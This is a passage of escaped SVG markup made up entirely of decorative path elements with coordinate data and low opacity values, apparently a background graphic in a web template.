d=\"M829.91,17.17c3.32,1.48,6.16,4,8.5,5.66.69,2.1.83,4,1.82,5,.54.56,2.52-.25,3.85-.44L844,26.26l-3.13-1.57,1.68-4.79.52.89,5.46-.74c2.14,1.1,3.93,2,5.74,2.95,1.08.55,2.9.83,3.16,1.63,1.61,4.89,4.53,2.43,7.35,1.72a17.15,17.15,0,0,1,4.64,0c.77,0,1.59.45,2.3.29,3.48-.78,6.07.56,8.42,3s3.3,2.39,5.56-.86h0l0,0h0c-1.9-.49-4-.6-5.64-1.55-2.79-1.6-5.49-3-8.83-2.53a1.37,1.37,0,0,1-.67,0c-2.43-.85-4.8-2.09-7.29-2.46-2.32-.35-4.77.22-7.41.4.25-1.64.44-2.83.62-4l-5.58-2.33-1.28-.27c-1.13.42-2.29,1.24-3.4,1.17-2.26-.13-4.56-1.22-6.33,1.25a3.36,3.36,0,0,1-2-1,4.6,4.6,0,0,0-4.76-2.91c-2.65,0-5.3-.43-8-.67L823,12.54l-4,0-1.36,1.23a11.41,11.41,0,0,0,2.6,1.37C823.45,15.84,827,15.86,829.91,17.17Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M628.92,64.11a4,4,0,0,0,2.57-1.64c1.61-3.27,4-2.52,6.27-1.29,3.89,2.08,8,1.82,10.88-.64l6.54.81c.05.43.13,1.18.18,1.61,6.45-2.75,14.07-1.15,19.28-6.26,4,3.24,3.87,3.16,7.22-.54a4.35,4.35,0,0,1,3.43-.95c3.6.59,6.43-.35,8.67-3.28s3-2.8,5.56,0l2.38-2.67a13.59,13.59,0,0,0-3.13-1.19c-3.33-.42-3.45-2.07-2.27-4.71.34-.74-.37-1.91-.45-2.9s0-2.27,0-3.41c1.2,0,2.64-.41,3.55.12a30,30,0,0,1,4.4,3.71c-.4-.91-1.31-2-1.11-2.71.86-3.1-.42-3.09-2.93-2.79-1,.12-2.25-1.43-3.39-2.22a14.65,14.65,0,0,1,2.5-1.72c1.06-.45,2.31-.45,3.37-.89.76-.32,2-1.2,1.91-1.55a22.79,22.79,0,0,0-1.6-3.82L699,26c.5-1,.78-2.26,1.56-2.94a29.86,29.86,0,0,1,4.4-2.71c.47,1,1,1.58,1,2.15-.08,2.06.56,4.18,2.67,3.75,1.19-.24,2-2.77,2.79-4.36.27-.53-.11-1.35,0-2,.18-1.56.46-3.11.7-4.66l.94-.57c2.37,4.62,5.35,3.84,8.33,1.56,1.77-1.36,3.91-2.68,4.86-4.55,1.87-3.63,2.13-4,6.66-2.81l-1.71,4.17c2.19,0,3.65.07,5.11,0,2-.12,4.31,1,5.73-1.59.21-.39,2-.5,2.47-.08,2.2,1.88,4.7.78,7,1.14a74.34,74.34,0,0,1,7.66,2,7.56,7.56,0,0,0,1.82.32c1.35,0,2.9-.49,4,0,2.42,1,4.58,2.68,6.93,3.9a14.93,14.93,0,0,0,3.31.88c0-1.07-.14-2.14-.07-3.19s.2-3.15.54-3.2a34.09,34.09,0,0,1,7.62-.28c.21,0,.26,2.7.33,4.15a13.6,13.6,0,0,0,0,2.71c.31,1.18.71,3,1.46,3.27,1.8.53,4,2.17,6-.42-.76-.89-1.8-1.63-2.08-2.59a4.11,4.11,0,0,1,.35-3.22,75.25,75.25,0,0,1,5.12-5.76l-4.23-.85h-1.75a23.59,23.59,0,0,1-4.87.23c-4.93-.78-9.8-1.94-14.74-2.64A7.7,7.7,0,0,0,764.73,9a12.36,12.36,0,0,1-11.05.46c-.51-.21-1.33-.55-1.59-.33-3.85,3.18-5.5-2.22-8.51-2.15-.06,0-.12-.41-.18-.62l-1.29.11c-2.07,3.28-4.58,3-7.61-.72l-4,0-8.09,4c-1.32-.92-3.16-1.42-4.43,1.62-.64,1.52-2,1.41-2.69-.2A31.91,31.91,0,0,1,714.1,7l-4.7.72c-.26.87-.58,1.72-.79,2.59-.65,2.77-1.66,4.61-4.66,2a1.92,1.92,0,0,0-1.27-.45C694,12.55,686,9,677.53,7.84c-7.12-1-10.72,2.1-15.18,6.16l-.93-2.22c-2.34.47-4.46.84-6.55,1.35-1.41.35-2.76.91-4.14,1.36s-3,.95-4.43,1.4c-2.86.87-2.94,3.58-2.8,5.56.17,2.28,1.58,4.46,2.5,6.81,3.22-2.47,1.91-7.61,6.6-9-1.43,5.66-2.78,11-4.11,16.31h8.27l1.52-2L660.16,35a62.13,62.13,0,0,0,6.15-1,6.4,6.4,0,0,0,2.42-1.67c2.82-2.66,4.43-2.49,6.69.82.5.74.89,1.55,1.33,2.33l1.27,0c3.29-1.6,4.49.31,5,2.79,1.88.76,3.88,1,5,2.18a5.3,5.3,0,0,1,1.31,4.43,5.08,5.08,0,0,1-3.59,2.81,45.42,45.42,0,0,1-10.16,0,7.44,7.44,0,0,1-4.27-2.35c-2.85-3.18-3.63-3.18-5.73,1.12-.32-1.48-.56-2.59-1-4.78l-5.06,7.23c-8.42-4.81-7.21-4.6-12.22.4-1.86-2.11-4.43-4.06-6.74-2-1.57,1.36-6.06.63-5.15,4.57h7a17.25,17.25,0,0,1,.21,3.11,29.4,29.4,0,0,1-.88,3.44,13.22,13.22,0,0,1-3.1-1.4c-1.86-1.49-3.39-1.28-5.13.2a2.66,2.66,0,0,1-2.33.28c-.43-.18-.58-1.34-.58-2.07,0-2,.15-3.93.24-5.9l-1.5-.44-4.38,5.54c.44,2.07.87,4.15,1.3,6.21-5.57,1.5-5.57,1.5-5.65,3.89,1.33-.18,2.63-.43,3.94-.51A35.87,35.87,0,0,0,628.92,64.11Zm31-43c-.86-.22-1.49-1.36-2.23-2.1.66-.59,1.27-1.59,2-1.67s1.46.81,2.2,1.27c.2.44.4.87.59,1.31C661.61,20.33,660.63,21.25,659.92,21.08Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M985,55.33c1.46-2.15,3-1.15,4.76-.44,5.9,2.42,12,3.57,18.34,2.29.65-.12,2,.4,2.1.83.72,3.42,3.4,3.9,6.1,4.17,6.63.67,13.45,2.49,19-3.39.76-.81,2.85-.92,4.13-.58,4.64,1.21,9.25,2.57,13.75,4.2s7.75.24,9.1-4.07a10.62,10.62,0,0,1,.93-1.83c1.5,2.4,2.88,4.59,4.67,7.46,2-2.3,3.74-4.51,5.69-6.53.87-.9,2.23-2,3.22-1.92s2.08,1.55,2.91,2.57,1,2.73,1.83,3c3.21,1,6.57,1.61,9.87,2.35.5-1.36,1-2.72,1.44-3.87l-9.51-3.68c.26-2.06,1.18-4.23.5-5-1.34-1.55-3.45-2.5-5.7-.66-.7.57-2.06.26-3.1.48-1.46.31-3.25.32-4.28,1.19-2.55,2.15-5.08,1.41-8.44.93l6-4.6-.54-1c-2.62.6-5.77-1.68-7.81,2.27a75.78,75.78,0,0,1-4.52,7l-5-4.48c-3.75.55-7.67.15-11.14,2.29-.61.38-1.7,0-2.58,0-2.43-.07-5.53-1.09-7.16,0-2.81,1.92-5,3.09-8.39,1.6-1.68-.74-3.94-.25-5.58-1-5.87-2.85-11.71-3.89-17.88-1.09-.41.18-1.15-.31-1.71-.55s-1.53-1.05-1.94-.85c-4.21,2.08-8.5-2.77-12.67.18-.17.13-.9-.23-1.14-.54-1.95-2.59-3.37-1.33-4.72.6,2.66,1.1,5.3,2.25,8,3.27A1.59,1.59,0,0,0,985,55.33Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M409.63,67.73c2.4.08,4.82-.07,7.23-.13a2.58,2.58,0,0,1,1.94-.47,8.4,8.4,0,0,0,1.4.43,4.27,4.27,0,0,1,1.22.21c3.68.44,7.7-.46,10.67,2.75.18.2.62.21,1,.25l17.24,2.13v3.48l11.92-2c5.85-1,10,3.53,15.15,4.94,3.69,1,6.73,1.89,10-.58,1.47-1.11,2.59-3.55,5-1.2.17.17,1.73-.58,2.1-1.21a40.76,40.76,0,0,0,2.08-4.91l-3.05-1.14-2,1.35-.95.4-.4,1c-.4.62-1,1.83-1.18,1.77-3.22-1.15-7.18.12-9.79-3l-3.3-.12c-.48,2.5-2.2,2.1-3.94,1.71A45.91,45.91,0,0,0,467,72.33c-2.9-.35-6.4.42-8.61-1-4.34-2.7-8.77-1.22-13.12-1.78-3.89-.5-8-.54-11.59-1.87-5.92-2.19-11.91-1.64-17.91-1.77-2.64,0-5.27,1.05-7.93,1.07A2.23,2.23,0,0,0,409.63,67.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M528.33,60,532,62.45l1-.27,2.73-2.76,2,2.1a1.43,1.43,0,0,0,.16.57c2,2.19,1.8,4.12-.66,6.21a1.48,1.48,0,0,0-.19.57c0,.71.06,1.42.08,2.13.91,0,2.15.29,2.65-.18,2.74-2.53,4.64-1.92,6.27,1.18a2,2,0,0,0,1.64.63c.48-.5,1.07-1.51.86-2-1-2.06.52-5.25-2.83-6.36-.17,0,.1-3.21.62-3.36,5.07-1.48,8.48-7.13,14.61-5.91.16,0,.45-.66.68-1l-.74-1.36.07-.12-3.44-.5-8.15,0-4.79.53c-.91,2.39-1.8,4.34-5.06,2.42A10.91,10.91,0,0,0,534,54c-3.57.08-6.12,2.92-5.72,6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M797.9,16.16c4.54,1.39,4.73,1.71,3.73,5.93,5.87,2.82,12.19.84,19.09,1.15L818.5,19c-2,1.22-3.54,2.9-4.49,2.61-2-.6-3.28-2.38-2.1-4.74l.71.53,3.64-3.57c-4-2.19-8.21-1.74-12.42-.6-1.08.29-2.19.49-3.28.74V9.76l-4,.62v.69C797,12.75,794.67,15.18,797.9,16.16Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M898.68,32.93A23.5,23.5,0,0,1,905,36.22c2.23,1.52,4.15,3.79,7.08,1.3a1.55,1.55,0,0,1,1.24-.28c3.11,1,6.21,2.07,9.67,3.24a6.75,6.75,0,0,1,8.71,1.39c1.94,2.4,6.73,2.33,9.15-.14a9.88,9.88,0,0,0-2.6-1.37c-8.16-1.43-15.42-6.32-23.95-6.26-2,.87-3.89,1.8-5.89,2.54-.32.12-1.27-.57-1.38-1a2.27,2.27,0,0,1,.64-1.7,19.13,19.13,0,0,1,2.13-1.87l-.15-.16-2.89-.56a48.5,48.5,0,0,0-5.84-2.1,17.66,17.66,0,0,0-4.35.07C896.65,30.87,896.43,32.29,898.68,32.93Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M600.59,62l2.14-1.93.07.87c2.81.33,5.62.75,8.44.87.42,0,1.19-1.39,1.28-2.2a10,10,0,0,0-.53-2.94c-.68-.56-1.32-1.17-2-1.67-3.19-2.25-6.4-4.47-9.6-6.71l-1.28,0c0,.3,0,.59,0,.89l3.51,2.9C598.91,57,598.36,59.78,600.59,62Z\" transform=\"translate(0 0)\"\n          opacity=\"0.1\"></path>\n        <path d=\"M793.24,26.65a4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76-1.26-3.64-.74-7.86-5.65-8.65-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0A12.07,12.07,0,0,0,793.24,26.65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M945.42,45.14a7.4,7.4,0,0,1,2.3.36c4.19,1,8.38,2,12.55,3,1.46.37,3.3.56,4.23,1.54,2.66,2.8,5.85,2.55,9.14,2.33-3.18-1.55-6.24-3.5-9.58-4.56-4.33-1.36-8.92-1.9-13.34-3-2.63-.66-5.17-1.72-7.75-2.59C942.68,44.16,943.16,45.34,945.42,45.14Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M705.23,41.47c.24,1,.49,2,.74,3,1.37.31,2.73.68,4.11.92a2.43,2.43,0,0,0,1.77-.14,2.19,2.19,0,0,0,.6-1.77C712.08,41.86,706.69,40.44,705.23,41.47Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M566.9,62.85l4.09-.37c0-.65,0-1.31.08-2l-3.93-.7Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M566.48,55.5c.88-.51,1.75-1,2.62-1.55,0-.33,0-.66,0-1l-2.67-.39h-.72l-1.25.23-.81,1.24C564,55.73,564.79,56.48,566.48,55.5Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.72,28.77c2.09-.33,4.87.74,5.44-2.68l-2.07-.77-3.41,3.4,0,0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M402,64.38a12,12,0,0,0-3.8-.12l3.72,1.19C401.88,65.09,401.91,64.73,402,64.38Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.65,70.75l.94,2.17,1.85-1.85-1.39-.76Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1092.16,55.67c.14-.05.18-.35.26-.54l-.57-.24c-.08.19-.27.42-.21.56A.55.55,0,0,0,1092.16,55.67Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M18.44,71.94A8.27,8.27,0,0,0,18,71c-3.4-.93-11.69-5.11-18-8v6.54C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M19.56,70.79a2.81,2.81,0,0,1,1.29-2.4c3.26-1.37,7-2,9.89-3.8,3.33-2.12,6-4.61,8.93.21.19.31,1.5-.08,2.3-.14a11.13,11.13,0,0,0-.78-2.49A13.83,13.83,0,0,0,39.1,60c2-.16,3.6.18,4.53-.44,3.66-2.47,7.56-2.39,11.66-1.88.84.11,1.77-.56,2.67-.87A66.19,66.19,0,0,0,49.7,56c-2.08,0-4.12,1.07-6.22,1.3C35,58.2,26.47,59,18,59.82L13.3,64.15l.6,1.25C15.24,67.29,17,69,18,71,19.1,71.33,19.69,71.3,19.56,70.79Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M66.23,56.25c2.09.74,3.41.14,4.79-1.32a8.11,8.11,0,0,1,2.36-1.45c1.93,2.9,4,.68,6,0,.73,4.47,3.79,5.76,8.55,3.67l-2.66-3.47c2.36-.27,4.3,0,5.56-.73,3.88-2.43,7.67-1.82,11.69-.68.89.25,2.06-.52,3.11-.82L94,49.77q-8.62,1.41-17.24,2.8a2,2,0,0,1-1-.2,5.37,5.37,0,0,0-6.17,1.43,3.11,3.11,0,0,1-2.58.66,7.68,7.68,0,0,0-7.71,2.11c1,0,2,0,3-.06C63.62,56.43,65.09,55.85,66.23,56.25Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path 